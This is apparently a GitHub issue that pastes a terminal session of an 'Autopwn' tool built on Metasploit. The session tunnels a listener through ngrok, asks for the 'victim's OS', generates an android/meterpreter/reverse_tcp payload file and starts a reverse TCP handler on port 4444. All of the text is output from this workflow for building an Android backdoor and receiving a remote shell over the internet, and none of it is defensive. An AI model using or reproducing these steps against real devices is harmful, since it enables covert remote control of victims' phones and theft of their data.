Open Drjacky opened 11 months ago
And with over internet:
Press 1 for WAN (over the internet)
Press 2 for LAN (On the same network)
1
start ngrok on your device, by opening
a new window in the terminal
and type "ngrok tcp 4444" then,
note down the port number after tcp://0.ngrok.tcp.io:"<port>"
and paste it below
12348
name of the desired file
autopwninternet
Now choose your victim`s OS
Press 1 for android
or
Press 2 for windows
1
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10239 bytes
payload $payload created successfully in
/Autopwn
starting the $payload handler.....
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
PAYLOAD => android/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 0.0.0.0:4444